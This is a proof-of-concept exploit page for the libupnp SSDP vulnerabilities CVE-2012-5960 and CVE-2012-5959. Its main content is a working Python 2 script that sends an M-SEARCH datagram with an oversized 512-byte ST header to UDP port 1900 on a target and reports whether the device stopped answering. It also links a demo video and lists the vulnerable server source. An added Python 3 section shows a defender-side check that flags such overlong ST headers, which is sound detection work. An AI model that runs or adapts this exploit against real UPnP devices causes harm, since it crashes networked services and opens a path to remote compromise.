Description
CVE-2012-5960, CVE-2012-5959 Proof of Concept
Introduction
# CVE-2012-5960-PoC
CVE-2012-5960, CVE-2012-5959 Proof of Concept
Just jotting down something I've been playing with lately.
```python
#!/usr/bin/python2
# -*- coding: utf-8 -*-
# Usage: python2 libupnp_DoS_PoC.py
import socket

TARGET = 'TARGET_IP'

'''
normal_traffic = \
    'M-SEARCH * HTTP/1.1\r\n' \
    'HOST:239.255.255.250:1900\r\n' \
    'MX:3\r\n' \
    'MAN:"ssdp:discover"\r\n' \
    'ST:upnp:rootdevice\r\n' \
    '\r\n'
'''

dos = \
    'M-SEARCH * HTTP/1.1\r\n' \
    'HOST:239.255.255.250:1900\r\n' \
    'MX:3\r\n' \
    'MAN:"ssdp:discover"\r\n' \
    'ST:uuid:schemas:device:{}:anything\r\n' \
    '\r\n'.format("A"*512)

# Set up UDP socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.settimeout(1)
s.sendto(dos, (TARGET, 1900))

try:
    while True:
        data, addr = s.recvfrom(65507)  # Maximum UDP data length
        print "------------------------\nFailed DoS...\n------------------------\n"
        print "Response:"
        print addr, data
        exit(1)
except socket.timeout:
    print "------------------------\nSuccessful DoS!!!\n------------------------\n"
    exit(0)
```
Tested on libupnp 1.6.13:

Demo video:
[http://www.youtube.com/watch?v=3W3NO3nnKJM](http://www.youtube.com/watch?v=3W3NO3nnKJM)
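
A defender-side check for the datagram shape used above, as an added example that is not part of the original repository: it parses UDP/1900 payloads and flags M-SEARCH requests whose `ST` header is far longer than any legitimate search target. It is written for Python 3; the function names and both length thresholds are assumptions chosen for illustration.

```python
# Added example (Python 3); not code from the PoC repository.
MAX_ST_LEN = 128     # assumed limit for the whole ST value
MAX_FIELD_LEN = 64   # assumed limit for one colon-separated ST field


def parse_ssdp(datagram):
    """Return (request_line, headers) or None if a header line is malformed."""
    head = datagram.decode("latin-1").split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    if not lines[0]:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            return None
        headers[name.strip().upper()] = value.strip()
    return lines[0], headers


def check_msearch(datagram):
    """Return a list of findings for one UDP/1900 payload (empty means clean)."""
    parsed = parse_ssdp(datagram)
    if parsed is None:
        return ["malformed SSDP datagram"]
    request_line, headers = parsed
    if not request_line.upper().startswith("M-SEARCH "):
        return []  # NOTIFY and responses carry no ST search target to check
    st = headers.get("ST")
    if st is None:
        return ["M-SEARCH without ST header"]
    findings = []
    if len(st) > MAX_ST_LEN:
        findings.append("ST header is %d bytes (limit %d)" % (len(st), MAX_ST_LEN))
    longest = max(len(field) for field in st.split(":"))
    if longest > MAX_FIELD_LEN:
        findings.append("ST field is %d bytes (limit %d)" % (longest, MAX_FIELD_LEN))
    return findings


# Constructed samples: the page's normal M-SEARCH, and one with its oversized ST shape.
NORMAL = (b'M-SEARCH * HTTP/1.1\r\nHOST:239.255.255.250:1900\r\nMX:3\r\n'
          b'MAN:"ssdp:discover"\r\nST:upnp:rootdevice\r\n\r\n')
OVERLONG = NORMAL.replace(b"upnp:rootdevice",
                          b"uuid:schemas:device:" + b"A" * 512 + b":anything")

if __name__ == "__main__":
    for label, sample in (("normal", NORMAL), ("overlong", OVERLONG)):
        print(label, check_msearch(sample) or "clean")
```

The same length test can be applied to payloads taken from a packet capture or placed in front of an SSDP listener.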
File snapshot
[4.0K] /data/pocs/39d473db7751cd111278a91909b89aee07a5c480
├── [1.2K] libupnp_DoS_PoC.py
├── [1.5K] README.md
└── [ 35K] ssdp_server(libupnp_1.6.13).c
0 directories, 3 files